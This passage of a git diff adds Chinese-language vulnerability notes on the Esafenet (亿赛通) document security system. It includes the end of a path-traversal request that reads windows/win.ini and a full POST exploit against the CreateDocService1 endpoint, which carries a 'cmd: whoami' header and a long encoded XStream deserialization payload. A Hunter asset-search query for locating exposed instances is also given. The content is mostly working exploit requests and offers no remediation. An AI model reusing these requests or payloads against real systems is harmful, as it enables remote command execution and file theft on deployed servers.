+Content-type: application/x-www-form-urlencoded
+Content-Length: 102
+Connection: close
+
+command=downclientpak&InstallationPack=../../../../../../../../../../windows/win.ini&forward=index.jsp
+```
+
+![1709050220404-e9b727a0-dcd7-43ee-a59e-600d2c799756.png](./img/mbkO_M4VWp-8yvxF/1709050220404-e9b727a0-dcd7-43ee-a59e-600d2c799756-467598.png)
+
+
+
+> 更新: 2024-04-20 22:01:30  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bp3z1gini1gk9gf8>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统CreateDocService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统CreateDocService1存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..37cfa6d
--- /dev/null
+++ b/亿赛通电子文档安全管理系统CreateDocService1存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统CreateDocService1存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统CreateDocService1存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/hzfoaEiaCAHdMefm/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-881104.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/CreateDocService1 HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
